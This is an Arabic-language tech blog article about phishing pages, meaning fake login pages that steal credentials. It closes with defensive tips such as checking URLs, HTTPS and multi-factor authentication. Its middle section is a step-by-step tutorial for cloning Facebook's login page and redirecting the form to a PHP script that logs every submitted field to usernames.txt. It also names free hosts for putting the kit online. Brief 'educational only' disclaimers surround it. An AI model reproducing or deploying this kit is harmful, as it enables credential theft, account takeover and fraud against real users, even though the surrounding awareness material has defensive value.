تعلم الحماية 🛡️

ما هي الصفحات المزورة وكيف تستخدم في اختراق الحسابات

يعتبر الاختراق عبر الصفحات والمواقع المزورة من أكثر الطرق انتشارا ًفي العالم والتي يمكن من خلالها أي مخترق سواء كان محترفًا أو مبتدئًا من اختراق العديد من الحسابات باستخدام هذه الصفحات المزورة أو الوهمية فقط.

هذا الاختراق يمكن أن يشمل حسابات فيسبوك أو انستجرام أو تويتر أو سناب شات أو واتساب وأيضًا صفحات وهمية لاختراق الألعاب والحسابات المصرفية مثل Paypal ووغير ذلك الكثير.

لهذا الغرض في هذا المقال ستتعرف على ما هي صفحات مزورة وكيف تستخدم في اختراق الحسابات، بالإضافة الى ذلك مجموعة من النصائح لتجنب هذه الصفحات المزورة التي يمكن أن تكون خطر على حساباتك ولن تقع ضحية لاختراق الصفحات المزيفة بعد الآن.

تحذير:

“نحن في هذا المقال نقدم لك محتوى تعليمي من أجل أن تتمكن سواء كنت مبتدئ أو متقدمفي مجال الحماية من التعرف على الأساليب التي يستخدمها المتسللون في عملية القرصنة، ولا نشجع أي شخص على استخدام طرق أو مواقع لسرقة الحسابات”.

ما هي الصفحات المزورة

الصفحات المزورة

تعد ما هي الصفحات المزورة أو صفحة تسجيل الدخول المزيفة في الأساس بمثابة نسخة من صفحة تسجيل دخول حقيقية تُستخدم لخداع الأشخاص لإدخال بيانات اعتماد تسجيل الدخول الخاصة بهم، والتي يمكن للقراصنة استخدامها لاحقًا لاقتحام حسابات عبر الإنترنت.

تعكس مواقع الويب هذه الصفحات الشرعية باستخدام شعارات الشركة والخطوط والتنسيق والقوالب العامة. اعتمادًا على الاهتمام بالتفاصيل التي وضعها المتسللون وراء موقع الويب المزور، قد يكون من المستحيل تقريبًا التمييز بين الموقع الحقيقي والمزور.

نتيجة لذلك، يمكن أن تكون صفحات تسجيل الدخول المزيفة فعالة للغاية في هدفها النهائي: سرقة بيانات تسجيل الدخول.

كيف تظهر هذه الصفحات في أول مرة؟

عادةً ما يستهدف المحتالون المستلمين برسائل التصيد الاحتيالي الإلكترونية التي تنتحل علامة تجارية موثوق بها. قد تشير رسائل البريد الإلكتروني هذه إلى أن المستخدم بحاجة إلى إعادة تعيين كلمة المرور الخاصة به أو إغرائه بصفقة تبدو جيدة جدًا لدرجة يصعب تصديقها.

إذا نقر الشخص المستهدف على الرابط في البريد الإلكتروني، فسيتم توجيهه إلى صفحة تسجيل الدخول المزيفة وسيُطلب منه إدخال اسم المستخدم وكلمة المرور.

بمجرد إرسال معلوماته، يمكن للمخترقين استخدام هذه البيانات من أجل إجراء هجمات على بيانات الاعتماد واختراق الملفات الشخصية على الإنترنت. قد يؤدي ذلك إلى الاحتيال على بطاقات الائتمان واستخراج البيانات والتحويلات البنكية وسرقة الهوية وغير ذلك الكثير.

كيف تستخدم الصفحات المزورة في اختراق الحسابات

الصفحة المزورة

عملية الصفحات المزورة تسمى في العالم التقني بتسمية التصيد أو Phishing، التصيد هو نشاط إجرامي تقني يستخدم تقنيات الهندسة الاجتماعية. يحاول المتسللون من خلاله الحصول بشكل احتيالي على معلومات مثل اسم المستخدم وكلمات المرور وتفاصيل بطاقة الائتمان، من خلال التنكر ككيان جدير بالثقة في اتصال إلكتروني.

الأسلوب الأكثر استخدامًا في التصيد الاحتيالي هو استخدام صفحات تسجيل الدخول المزورة (صفحة التصيد)، والمعروفة أيضًا باسم الصفحات المزيفة.

تشبه صفحات تسجيل الدخول المزيفة هذه صفحات تسجيل الدخول الأصلية وتبدو مثل موقع الويب الحقيقي. لكنها مزيفة هدفها الحصول على كلمة مرور للمستخدم من بين المواقع التي يمكن من خلالها صنع صفحة مزورة بنفسك موقع Sc0m تسجيل.

يتم إنشاء معظم صفحات التصيد الاحتيالي لمواقع مثل Facebook و Instagram و Yahoo و Gmail و MySpace وما إلى ذلك بواسطة المتسللين. يستخدمون هذه المواقع في الغالب لسبب واضح، بسبب قاعدة المستخدمين الكبيرة.

يتم خداع الضحية للاعتقاد بأن صفحة Facebook المزيفة هي الصفحة الحقيقية وإدخال كلمة المرور الخاصة به.

لحماية نفسك من التصيد الاحتيالي، لا تفتح روابط وهمية أو غير معروفة. تحقق من عنوان URL (عنوان مجال موقع الويب) الخاص بالموقع قبل تقديم أي معلومات. لأن الصفحة المزيفة لها عنوان URL مختلف. Phishing FB هي الحيلة الشائعة. لذلك، معظم الناس يعرفون ذلك. ستجد بعض النصائح لمنع نفسك من هذا النوع من القرصنة في القفرات القادمة.

كيفية إنشاء صفحة مزورة خطوة بخطوة

كيف تصنع الصفحة المزورة Phishing؟ هل من الصعب القيام بذلك أم أن هناك أي مهارة فنية مطلوبة لذلك مثل البرمجة والشبكات وما إلى ذلك؟ من السهل إنشاء صفحة تصيد. ما عليك سوى معرفة بعض المعارف الأساسية حول كيفية عملها والإجراء الذي تعمل فيه. يمكنك تعلم كل شيء في هذه المقالة.

يتم شرح كل شيء في خطوات للأغراض التعليمية فقط، ولا ننصح باستعمالها لأغراض غير قانونية، سنشرح لك طريقة عمل صفحة مزورة من فيسبوك.

مثلا يتم الدخول إلى Facebook.com ثم النقر بزر الماوس الأيمن فوق المنطقة الفارغة، بعد ذلك يظهر خيار “عرض صفحة المصدر: option view source” يتم النقر عليه

.

صفحة المزورة

بعد ذلك يتم فتح علامة تبويب تحتوي على الكود المصدري لصفحة تسجيل الدخول إلى Facebook. في هذه الحالة يتم تحديد ثم نسخ كل الكود ولإلصاقه في المفكرة.

صفحات المزورة

بعد القيام بذلك يتم فتح المفكرة التي تم إلصاق الكود فيها ثم الضغط على CTRL + F واكتب ACTION.

صفحات مزورة

في هذه الحالة يقوم الشخص الذي يريد إنشاء صفحة مزورة للفيسبوك مثلا بالبحث عن عنوان مثل

action=”https://www.facebook.com/login.php?login_attempt=1&lwv=110“

موقع الصفحات المزورة

عند إيجاد الرمز المشابه للرمز السابق، كل ما يتم القيام به هو حذف جميع التعليمات البرمجية النصية المشابهة للكود أعلاه واستبدالها بـ Post.php. ثم سيبدو مثل

action = ”post.php

موقع صفحات مزورة

هذا الكود يتم الاحتفاظ به على سطح المكتب باسم index.htm، الآن صفحة المزورة جاهزة للتصيد، لكن في هذه الحالة لابد من إنشاء ملف PHP لهذا الغرض. وذلك من خلال فتح مفكرة جديدة ثم نسخ الكود الوارد أدناه ومن ثم حفظه باسم post.php

p

header (‘Location:http://www.facebook.com/’);

$handle = fopen(“usernames.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

بهذه الطريقة سيتم إنشاء ملفين هما

index.htm

post.php

في هذه الحالة يجب تحميل هذين الملفين السابقين في موقع استضافة ويب مجاني. بعض أفضل مواقع الاستضافة على شبكة الإنترنت والتي تفيدك. تحتاج إلى إنشاء حساب على أي واحد من مواقع الويب المضيفة أدناه:

  • my3gb
  • Bluehost
  • 000webhost
  • Freehosting

: الآن، يجب التسجيل للحصول على حساب. من خلال النقر فوق تسجيل مجاني واملأ جميع المعلومات المطلوبة في نموذج التسجيل. عندما يتم إعداد حسابك بالكامل، في هذه الحالة يجب تسجيل الدخول باستخدام اسم المستخدم وكلمة المرور الخاصين بك.

صفحه وهميه

بعدذلك يتم فتح Cpanel (لوحة التحكم) ثم النقر فوق مدير الملفات. بعد ذلك، ستظهر نافذة جديدة. يتم الذهاب إلى public_html.

في الأخير يتم حذف الملف المسمى default.php بعد ذلك، تحميل ملف index.htm و post.php. النقر فوق زر تحميل الملفات ثم تحميل كلا الملفين واحدًا تلو الآخر. ومن ثم النقر على index.htm الذي سيبدو مثل صفحة Facebook الأصلية. هذه هي صفحة التصيد الخاصة بك على فيسبوك.

“ملاحظة:
يعتبر التصيد جريمة جنائية ونشاط غير قانوني، لذا لا تحاول القيام به مع أي شخص. هذا البرنامج التعليمي هو لغرض تعليمي. يمكنك تعلم هذه الأشياء لتعزيز معرفتك ويمكنك تجربتها على نظامك الخاص لتتعلمها”.

نصائح تجنب الصفحات المزورة

أهم شيء من أجل تجنب صفحات تسجيل الدخول المزورة هو معرفة كيفية التعرف عليها. اتبع هذه النصائح لمساعدتك في فك الشفرة بين موقع ويب أصلي ومزور:

لا تقع في فخ التصيد الاحتيالي

يتم تداول معظم صفحات تسجيل الدخول المزورة في مواجهة رسائل التصيد الاحتيالي. إذا تلقيت رسالة مشبوهة تطلب تفاصيل شخصية، فهناك عدة طرق لتحديد ما إذا كان قد أرسلها مخادع بهدف سرقة هويتك.

غالبًا ما يرسل المخادعون الرسائل بنبرة ملحة، ويحاولون إثارة المشاعر مثل الإثارة أو الخوف. إذا حثتك رسالة بريد إلكتروني غير مرغوب فيها على “التصرف بسرعة” فعليك التمهل وتقييم الوضع بكل حدر.

ابحث عن الأخطاء الإملائية أو النحوية

في كثير من الأحيان، سيستخدم المتسللون عنوان URL لموقعهم المخادع على بعد حرف واحد فقط من الموقع الشرعي، مثل استخدام “www.rbcr0yalbank.com” مقابل “www.rbcroyalbank.com”.

قبل النقر فوق أي موقع ويب من رسالة بريد إلكتروني أو صفحة تتوصل بها تطلب منك التصرف، مرر مؤشر الماوس فوق الرابط. سيسمح لك هذا بمعاينة عنوان URL وتحديد أي أخطاء إملائية مشبوهة أو أخطاء نحوية قبل الانتقال إلى موقع ويب يحتمل أن يكون خطيرًا.

تأكد من تأمين موقع الويب باستخدام HTTPS

HTTPS، أو بروتوكول نقل النص التشعبي الآمن، هو بروتوكول يقوم بتشفير تفاعلك مع موقع ويب. عادةً ما تُعتبر مواقع الويب التي تبدأ بـ HTTPS وتتميز بقفل في الزاوية اليسرى العلوية أكثر أمانًا.

مع ذلك، فقد طور متسسللو الإنترنت مؤخرًا مجموعات أدوات للبرامج الضارة التي تستفيد من HTTPS لإخفاء البرامج الضارة من الكشف عن طريق دفاعات أمنية مختلفة. إذا كان موقع الويب مؤمنًا باستخدام HTTPS ، فتأكد من أن هذه ليست الطريقة الوحيدة لتحليل الصفحة من أجل الأمان عبر الإنترنت.

تمكين المصادقة متعددة العوامل

تتطلب المصادقة متعددة العوامل أن يقوم المستخدمون بتأكيد مجموعة من الأشياء للتحقق من هويتهم – عادة ما يكون لديهم شيء، وعامل فريد بالنسبة لكيانهم المادي – مثل فحص شبكية العين أو بصمة الإصبع.

يمكن أن يمنع ذلك مجرمي الإنترنت من استخدام أساليب الاختراق المعروفة (حيث سيستخدمون مجموعات البريد الإلكتروني وكلمات المرور لاختراق ملفات التعريف عبر الإنترنت) للوصول إلى شبكتك أو حسابك إذا تم الكشف عن تفاصيل تسجيل الدخول الخاصة بك أثناء خرق البيانات، لذلك تبقى فحص شبكية العين أو بصمة الإصبع من بين أ‘لى مستويات الأمان.

اشترك في خدمة التنبيه بسرقة الهوية

خدمة تنبيه سرقة الهوية تحذرك من الأنشطة المشبوهة التي تحيط بمعلوماتك الشخصية، مما يسمح لك بالانتقال إلى العمل قبل حدوث ضرر لا يمكن إصلاحه. نقترح عليك إضافة McAfee Total Protection الفعالة، ما يميزها أنها لا تحافظ على أجهزتك في مأمن من الفيروسات فحسب، بل تمنحك أيضًا راحة البال بأن هويتك آمنة أيضًا.

خلاصة:

وختاماً، في هذا المقال تعرفنا على ما هي الصفحات المزورة وكيف تستخدم في اختراق الحسابات، وكيف نحمي نفسنا منها، بالإضافة الى ذلك شاركنا معك طريقة تعليمية لمعرفة كيف يتم إنشاء الصفحات المزورة.

لا ننصحك بإستعمال هذه الطريقة لأغراض غير قانونية لأنه يمكن أن يؤدي بك ذلك لعواقب غير مرغوب فيها، والشرح الموجود في هذا المقال فقط للغرض التعليمي.

انتهى.

فريق التحرير H

خبير متخصص في مجال التقنية. بفضل معرفتي الواسعة بعالم التكنولوجيا، أقدم مقالات مميزة ومفهومة بسهولة تتعامل مع أحدث التطورات التقنية والأفكار الرائدة. بفضل خبرتي الوافرة، أسعى دائمًا لتقديم حلول بسيطة ومفيدة لزوار الموقع، مساعدًا الناس في فهم التقنية واستفادتها في حياتهم اليومية. تجمع مقالاتي بين الاستفادة العملية والإلهام لمتابعينا، في حالة كان لديك أي مشكل في ما يخص المقال المرجو ترك تعليك، سوف اكون سعيد بالاجابة عن سؤالك او حل المشكل الخاص بك.
Subscribe
نبّهني عن

3 تعليقات
Inline Feedbacks
View all comments